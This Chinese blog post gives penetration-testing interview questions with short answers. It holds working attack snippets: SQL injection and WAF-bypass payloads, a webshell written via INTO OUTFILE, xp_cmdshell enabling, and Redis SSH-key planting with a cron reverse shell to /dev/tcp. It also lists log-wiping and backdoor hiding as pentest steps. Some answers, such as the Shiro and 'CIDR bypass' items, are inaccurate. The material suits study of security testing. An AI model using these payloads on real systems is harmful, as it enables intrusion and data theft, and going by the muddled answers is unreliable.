2025年渗透测试面试题总结- 某亭-安全研究员(题目+回答)

server/2025/3/25 14:05:41/

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、SQL注入过滤单引号绕过方法

二、MySQL报错注入常用函数

三、报错注入绕WAF

四、MySQL写文件函数

五、MySQL提权方式

六、SQL Server其他渗透方式

七、SSRF原理与利用

八、内网IP过滤绕过

九、Redis漏洞利用

十、文件读取与路径获取

十一、反序列化漏洞

十二、渗透测试流程

十三、CMS指纹特征(以WordPress为例)

十四、正向代理与反向代理区别

十五、常见端口与服务

十六、弱密码绕过验证码

十七、非对称加密过程(RSA)


 

 

SQL注入过滤单引号怎么绕过
mysql报错注入常用函数
报错注入绕WAF
mysql写文件函数
into outfile使用有哪些限制
mysql提权
SQL server除了SQL注入以外还有哪些渗透方式
SSRF原理
SSRF可以利用的协议
哪些功能点会存在SSRF漏洞
对内网IP进行过滤,有什么绕过方式
redis rce过程
redis未授权怎么获得服务器权限
redis主从复制漏洞
任意文件读取一般读取哪些文件
如何通过文件读取获得web的绝对路径
/ect/passwd 文件包含哪些内容
java 反序列化漏洞
shiro反序列化漏洞
哪些组件或者中间件存在反序列化漏洞
渗透测试一个站点的具体流程
说一个熟悉的CMS,具有哪些指纹特征
正向代理和反向代理的区别
常见端口对应服务
常见的内置用户
弱密码存在验证码如何绕过
非对称加密的加密过程

一、SQL注入过滤单引号绕过方法

  1. 双写单引号' 转为 '',可能被过滤,但部分场景可尝试 ' OR 1=1--
  2. Hex编码:将字符串转为16进制,如 SELECT * FROM users WHERE username=0x61646D696E
  3. 宽字节注入:针对GBK编码数据库,利用%df%27触发编码错误(%df与反斜杠\结合生成繁体字符)。
  4. CHAR()函数:用CHAR(39)代替单引号(如SELECT CHAR(97,100,109,105,110)对应admin)。
  5. 字符串拼接:如CONCAT('a','dmin')拼接为admin

二、MySQL报错注入常用函数

  1. updatexml()sql
    AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    触发XPath语法错误,返回查询结果。
  2. extractvalue()
    sqlAND extractvalue(1,concat(0x7e,(SELECT database())))
    类似updatexml,利用XML解析报错。
  3. floor()+rand()
    sqlSELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))
    利用主键重复报错。
  4. exp()sql
    AND exp(~(SELECT * FROM(SELECT user())a))
    数值过大导致溢出报错。

三、报错注入绕WAF

  1. 分块传输:通过HTTP分块编码绕过正则检测。
  2. 注释干扰
    sql/*!50000updatexml*/(1,concat(0x7e,user()),1)
  3. 大小写混合:如UpDaTeXmL()
  4. 特殊符号分割
    sqlupdatexml(1,concat(0x7e,user()%23),1)
  5. 编码混淆:使用URL编码、Unicode编码(如%u0027代替单引号)。

四、MySQL写文件函数

  1. into outfile:写入多行数据,需绝对路径和权限。
    sqlSELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php' 
  2. dumpfile:写入二进制文件(如SSH密钥)。

限制

  • secure_file_priv需为空或目标目录。
  • Web目录需可写且路径正确。

五、MySQL提权方式

  1. UDF提权
    • 上传自定义动态库(如lib_mysqludf_sys.so )。
    • 创建函数执行系统命令:
      sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so' 
  2. 启动项提权
    sqlSELECT '恶意命令' INTO OUTFILE '/etc/rc.local' 
  3. CVE漏洞利用:如CVE-2016-6662(权限配置不当)。

六、SQL Server其他渗透方式

  1. xp_cmdshell:启用后执行系统命令。
    sqlEXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
  2. SSRS漏洞:利用Reporting Services的文件上传漏洞。
  3. 数据库链接攻击:通过OPENROWSET跨数据库查询。

七、SSRF原理与利用

  1. 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
  2. 协议利用
    • file://读取本地文件(如file:///etc/passwd)。
    • gopher://构造任意TCP流量(攻击Redis/MySQL)。
    • dict://探测端口信息。
  3. 高危功能点
    • 在线翻译、网页截图、URL预览、XML解析(XXE)等。

八、内网IP过滤绕过

  1. 进制转换127.0.0.1转为2130706433(十进制)或0177.0.0.1(八进制)。
  2. 域名重定向:使用短域名服务或xip.io (如127.0.0.1.xip.io )。
  3. CIDR绕过127.127.127.127/8

九、Redis漏洞利用

  1. 未授权访问RCE
    • 写入SSH密钥:
      redisconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
    • 定时任务提权:
      redisset x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save 
  2. 主从复制漏洞:加载恶意模块执行命令。

十、文件读取与路径获取

  1. 敏感文件
    • /etc/passwd:用户列表。
    • /proc/self/environ:环境变量(可能含路径)。
    • 日志文件(如/var/log/apache2/access.log )。
  2. 路径获取
    • 从PHP错误日志或phpinfo()中查找绝对路径。
    • 配置文件(如config.php 中的__DIR__)。

十一、反序列化漏洞

  1. Java反序列化:Apache Commons Collections的InvokerTransformer链触发RCE。
  2. Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
  3. 常见漏洞组件
    • WebLogic(CVE-2020-14882)。
    • Fastjson(自动类型推断导致的RCE)。

十二、渗透测试流程

  1. 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
  2. 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
  3. 漏洞利用:Metasploit框架、手工验证。
  4. 权限提升:Linux脏牛漏洞、Windows MS14-058。
  5. 痕迹清理:删除日志、隐藏后门。

十三、CMS指纹特征(以WordPress为例)

  1. 目录结构/wp-content/plugins//wp-admin/
  2. HTTP头X-Powered-By: WordPress
  3. 默认文件readme.htmlwp-login.php

十四、正向代理与反向代理区别

正向代理反向代理
代理客户端(隐藏客户端IP)代理服务端(隐藏服务器IP)
用于突破访问限制(如VPN)用于负载均衡(如Nginx)

十五、常见端口与服务

端口服务协议
22SSHTCP
80HTTPTCP
443HTTPSTCP
3306MySQLTCP
6379RedisTCP

十六、弱密码绕过验证码

  1. OCR识别:Tesseract识别简单验证码。
  2. 验证码复用:同一会话重复提交。
  3. Burp暴力破解:设置Intruder模块跳过验证码参数。

十七、非对称加密过程(RSA)

  1. 密钥生成:生成公钥(公开)和私钥(保密)。
  2. 加密:用公钥加密明文(如c = m^e mod n)。
  3. 解密:用私钥解密密文(如m = c^d mod n)。
  4. 应用场景:HTTPS握手、SSH登录。


http://www.ppmy.cn/server/178478.html

相关文章

2025年01月02日浙江鼎永前端面试

目录 webpack 和 vite 区别react fiber 架构vue diff 算法react diff 算法hooks 源码垂直水平布局项目介绍单点登录大文件上传微前端 1. webpack 和 vite 区别 Webpack 和 Vite 是两种不同的前端构建工具&#xff0c;它们在设计理念、性能表现和使用场景上存在显著差异。以下…

如何将外网 Git 仓库完整迁移到本地仓库并保留提交历史(附原理详解)

背景 最近在迁移第三方Git仓库到本地私有仓库时&#xff0c;发现了一种简单高效的方法&#xff0c;可以完整保留原仓库的提交日志。本文将详细解析操作步骤及其背后的Git原理&#xff0c;帮助开发者理解这一过程的本质。 我需要将第三方开源仓库&#xff08;如GitHub仓库A&am…

Gone v2 使用 goner/viper/remote链接远程的配置中心,支持etcd、consul、firestore、nats

&#x1f680; 发现 gone-io/gone&#xff1a;一个优雅的 Go 依赖注入框架&#xff01;&#x1f4bb; 它让您的代码更简洁、更易测试。&#x1f50d; 框架轻量却功能强大&#xff0c;完美平衡了灵活性与易用性。⭐ 如果您喜欢这个项目&#xff0c;请给我们点个星&#xff01;&a…

DeepSeek写打台球手机小游戏

DeepSeek写打台球手机小游戏 提问 根据提的要求&#xff0c;让DeepSeek整理的需求&#xff0c;进行提问&#xff0c;内容如下&#xff1a; 请生成一个包含以下功能的可运行移动端打台球小游戏H5文件&#xff1a; 要求 可以重新开始游戏 可以暂停游戏 有白球和其他颜色的球&am…

MyBatis 中 #{} 和 ${} 的区别详解

目录 1. #{} 和 ${} 的基本概念 1.1 #{} 1.2 ${} 2. #{} 和 ${} 的工作原理 2.1 #{} 的工作原理 2.2 ${} 的工作原理 3.共同点&#xff1a;动态 SQL 查询 4. 区别&#xff1a;处理方式和适用场景 4.1 处理方式 4.2 适用场景 &#xff08;1&#xff09;#{} 的适用场景…

【SpringBoot】MorningBox小程序的完整后端接口文档

以下是「晨光宅配」小程序的完整接口文档,涵盖了所有12个表的接口。 每个接口包括请求方法、URL、请求参数、响应格式和示例 接口文档 1. 用户模块 1.1 获取用户信息 URL: /user/{userId}方法: GET请求参数: userId (路径参数): 用户ID响应格式:{"userId": 1,&qu…

在linux服务器部署Heygem

前言&#xff1a; Heygem官方文档上提供了基于windwos系统的安装方案。在实际使用过程中个人电脑的配置可能不够。这个时候如果服务器配置够的话&#xff0c;可以尝试在服务器上装一下。但是服务器一般都是linux系统的&#xff0c;于是这篇教程就出现了… 可行性分析 通读安装…

html实现table超出宽度后滑动展示

需求:这是一个详情页面,table等标签都是在后台录入的,要求实现table表格超出屏幕宽度后,可以左右滑动展示的效果。 .knowledgeDetails table{overflow: hidden;height: auto !important;width: 100%